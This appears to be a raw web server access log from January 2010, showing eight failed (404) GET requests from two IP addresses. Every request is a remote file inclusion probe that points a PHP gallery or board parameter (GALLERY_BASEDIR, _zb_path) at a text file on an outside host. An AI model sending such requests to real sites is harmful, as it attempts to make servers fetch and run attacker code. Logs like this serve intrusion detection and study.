67.19.194.26 - - [05/Jan/2010:00:45:28 -0500] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:45:28 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:45:28 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:45:28 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:45:29 -0500] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:45:33 -0500] "GET /logs/access_log.Q109081000%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:00:45:33 -0500] "GET /logs/access_log.Q109081000%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:00:45:46 -0500] "GET /logs/access_log.Q109072200//skin/zero_vote/?_zb_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
